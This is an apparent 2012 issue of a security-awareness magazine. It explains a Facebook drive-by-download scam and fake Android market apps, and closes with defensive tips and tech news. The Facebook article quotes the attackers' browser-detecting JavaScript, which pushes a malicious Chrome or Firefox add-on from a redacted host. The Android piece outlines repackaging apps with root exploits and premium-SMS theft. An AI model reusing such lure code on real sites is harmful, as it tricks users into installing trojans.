FACEBOOK MALWARES EXPLAINED Drive-By-Download attacks

The Technology and living has evolved. Worldwide most of the people live two breathes, the real world and the virtual world. The social networking websites such as Facebook and Twitter are getting ultimate popularity all over the world and users of these websites are constantly increasing, that makes the cyber criminals to create dirty tricks and hacks to get the users into their hole. The last month issue has detailed about Facebook scams and malwares and the importance of safety on the social networking websites are explained. Now we have one interesting malware to discuss about, that spreads through Facebook posts and comments. This Malware has well programmed and well-designed fake website for phishing the user details and get the Trojan files to be dropped into your computer. Initially the cracker or malicious programmer develops a plug-in/add-on for various famous browsers such as Mozilla Firefox, Google Chrome and Microsoft Internet Explorer. The basic knowledge in web designing languages like PHP, JavaScript, XML and CSS are the only prerequisites for creating this kind of malicious plug-in/add-on. The cracker will develop a Trojan dropper that can be added to any browser and injects the payload into your computer.

36 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Here the cracker have two problems, “the user has to visit the malicious website” and “they must install the plug-in by their self “. So the cracker has to use some tricks to get the user to their malicious website and make them click the add-on link to install, this kind of trick or hack is formally known as Drive-By Download. I.e. The users infect their-self to the malware. The below screenshot shows the Facebook page where a scam is posted on a user’s wall:

Whenever any of the user clicks on the link will be redirected to the below like website, amazingly that will look alike the Facebook page. That makes the user, feel that they were still on the Facebook’s web page.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 37


REAL TIME Most of the users will not notice that the domain/URL of the website has changed to something else and continue as they were still surfing Facebook. In this situation, the viral script ran behind the screen will automatically detect the browser and redirects to different pages as they have various malware programmed for various browsers. I.e. for Firefox the add-on will be *.xpi format and Chrome has *.crx format. The cracker programs these different types of malicious add-ons to extent the user infection rate. var is_chrome = navigator.userAgent.toLowerCase(). indexOf(‘chrome’) > -1; var is_firefox = navigator.userAgent.toLowerCase(). indexOf(‘firefox’) > -1; function instalar(){ if (is_chrome){ window.open(“http://[removed].com/Divx.crx”); } else if(is_firefox){ var params = { “Youtube Extension”: { URL: “http://[removed].com/Divx.xpi”, toString: function () { return this.URL; } } }; InstallTrigger.install(params); } else{ window.open(“”); } } Simple script used to detect the browser and execute approriate action for each

At first the script checks whether the browser is chrome. If so it will try to install the plugin “Divx.crx”. If not, it will check the browser is Firefox or not. If so it will install “Divx.xpi”. If both conditions are failed, i.e. the bowser may be Internet Explorer or anything else, it will redirect the page to “/watch.php” which contains porno or survey links to get profit out of the user.

38 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


(We continued the website as in Firefox), The malicious website has a video player like CSS block(FAKE) and shows some error message that “ the required plug-in to play this video has not found “ or crashed (actually such one doesn’t exist!) and you have to install a plug-in from their website. If the user clicks on the install plug-in link, it will automatically install a Trojan dropper to the browser that may download and install the payload from a remote server. The payload will install malicious programs or any affiliated Adware on the victim’s computer that may use to steal user data, cookies and show ads.

After the user click on “install Plugin” link. Firefox asking the user for permission.

The malicious addon is installing from the remote the server. WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 39


REAL TIME

The same website opened in internet explorer leads to this page

After the continue, the website showing some survey to take

After clicking the survey link, it will redirect the user to take some other malicious or porno websites

40 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


The website will wait, untill the user completes the survey in the link through page

To prevent this kind of attacks, we have some tips you: Do not click on the suspected URLs/Links posted on your wall and comments. Do not click the shorten URL directly. Extract the URL using such services and then visit. Do not fall into the click-jacking by any porno-videos, videos that makes you to eagerly clicks on the link. Have a good updated anti-malware / security program installed on your computer. Install the Firefox safety add-ons such as WOT, NoScript. Since most of the Facebook attacks are happen only by the user’s insufficient knowledge, you should subscribe regular updates from security research labs & internet security websites to update your knowledge. Have a safe and happy social networking friends.

.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 41


REAL TIME

ANDROID malwares

FAKE APPS ON GOOGLE’S ANDROID MARKET

The era of mobile devices, minimizes the word to tiny and compact inside our hands. Rapidly increasing number of users for mobile devices such as mobile phones, tablets makes the hackers to open their store in the mobile platform. Google’s Android platform is now the most popular for malicious mobile programs, overtaking other platforms as well as ‘generic’ Java malware. The share of Android-based malicious programs among all mobile malware is more than 46%, and growing rapidly, according to security firm Kaspersky Lab. There is no surprise that whenever we have increasing population in a platform, there will be the risk and problem arises. Google’s Android holds the 47% share in the entire mobile platform. According to Google approximately 700000 android devices activated daily.

42 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


To reduce the risk of malicious program installations Google recommends its users to download the apps and games only from the Android market, which is the official shop for both paid and free applications. But the frequent occurrences of some fake apps are uploaded to the android market and later they were removed by Google, makes nastiest feel to the users who trust on the Android Market blindly. The screenshot shown below illustrates the fake apps that are more likely to be the famous genuine android apps. Want to know the difference? Observe closer to the price & developer of the apps!

Fake apps listed on android market by miriada production Confused? The original “Angry Birds” app was developed by “Rovio Mobile”. But the screenshot shown above are not genuine apps and are fake apps uploaded by a malicious uploader named as “Miriada Production”. Currently, Google has deleted this user’s account and uploads. But there are lot of users affected by this malware.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 43


REAL TIME The users who have installed this fake app are become the victim of this malware. The user’s data, account associated with the android market, Google account (that includes Gmail, BlogSpot, Google+..Etc.) will be stolen and the money on your mobile balance can also be stolen by sending hidden SMS to premium rated code numbers.

How do they do that? As the first thing, the malicious user develops a malware program independently or buys from other crackers. In most cases they download the original apps from the official market and then decompile them to get the source code of the app. The android apps have the *.apk file extension. There are several programs that can convert *.apk files in to readable code.

Extracted files from a *.APK file

AndroidManifest.xml => Contains the information about app and devloper of the app Res Folder => Contains the graphical elements such as icons, pictures..etc. Classes.Dex => Important file that contains the source code of the app, but it will be in unreadable format. you can not read / modify it as a plain text file.

44 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


After getting the source code of the original app, the cracker adds his own code into the legitimate code.

Connecting to a remote server for malicious file

Checking permissions and getting root

Getting root using various exploits based on version

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 45


REAL TIME

Drop file if not installed

Additional trojan functionality image source: isolated thread

46 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Then the cracker creates an Android Developer account in the official market using fake the information.

Now he will get a personal developer certificate, which can be used to sign his fake app and then upload it to the market. After uploading he will add the information same as the original app in the market and sells the app as lower than the original app (Even give it for FREE of cost). So that most of the users will download the fake app instead of buying the original one and infect their self by the malware. Until the users’ complaint about the malicious app or the Google finds that app as rogue, the fake app will reach large number of innocent users and cause damage to them.

How to prevent? Always check the name, developer of the app and clearly check the app for misspelled words before downloading.(e.g. Angry Bird is not Angre Bird) While installing an application to the device, verify the access permissions evidently and avoid any suspicious permissions are asked. (e.g. A calculator application doesn’t require the SMS sending/receiving permission.) Read the users review of that specific application, before downloading.

.

Use a good, updated security or anti-malware program in your device. (it can affect your device performance and battery life.) WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 47


TECHNO

Shortage of Disk Drives to Continue Through 2012 HDD factories surrounded in the floods

Seagate Technology said that supply of hard disk drives (HDDs) this year will continue to fall short of demand, leading large customers to look to long-term agreements to ensure supply after devastating floods in Thailand. Shortage of drives by the end of this year is likely to be about 150 million units. The company plans to auction about 200,000 drives later this week to gauge demand, and provide customers an additional channel to buy the drives. Seagate plans to conduct such auctions periodically, said Steve Luczo, Seagate’s CEO. Western Digital, which had its factories surrounded in the floods, said that it expects its HDD production capacity to reach pre-flood levels only by the third quarter of this year.

48 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


GOOGLE TV DEVICES UPDATED ! SONY HAS UPDATES FOR THEIR DEVICES

The official Google TV team let us all know that Sony has an update in the works for their Google TV devices. The update will bring a Chrome browser that “works faster” and enable 3D for Blu-ray discs. Expect the update for your devices this week. A better browser is something everyone loves, but no word if any updates are coming for the Logitech Revue, which has been discontinued. Twitted @GoogleTV

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 49


GEEK JOKES !

NEWTON Vs STEVE JOBS

RECYCLE OLD COMPUTERS

50 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


HOW TO BE A GENIUS

WEB EFFECT

.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 51


FROM IMHAKER TEAM Thank you so much friends, for all your feedbacks and suggestions. Since we assured we have increased the number of pages. Hope you get delight in this month’s issue. We are also planning to publish the magazine in *.EPUB and *.MOBI formats in future. ImHaker team is working very hard to improve each and every issue; we really need your support to fulfil your needs. So please give us a feedback or suggestion to improve the magazine in any form.

WRITE FOR IMHAKER! If you think, you can write articles for ImHaker? Don’t hesitate! Act now. Send us your article before 25th of the month; it will be published in the next issue. Just follow the simple rules given below, (*) The article must be “genuine” & limited to 2 to 4 pages. (*) Do not write articles on illegal/cracking/keygen/patch titles. (*) The articles are not limited to any specific topic. (*) Only one article per author will be published. (*) Please send your articles in Ms-word *.doc or *.docx format (include images, if any) to “submit@imhaker.com“& also include your profile information with photograph to be published along with your article.

What to advertise on ImHaker? Send your probes to “ads@imhaker.com”

Disclaimer The entire information shared in this magazine are strictly for educational purpose & to improve the security defence attitude to prevent hacker attacks. Do not abuse any information provided by ImHaker magazine. If you cause any damage to your own or any others properties directly or indirectly by the information provided, ImHaker Magazine and the authors are not responsible for that. Hacking is a crime, if it is implemented illegally. Secure yourself and help others

.

ImHaker Magazine February 2012  

ImHaker Cyber Security Magazine for common people. To make awareness among people about hackers and security issues. Grub your FREE copy at...

Advertisement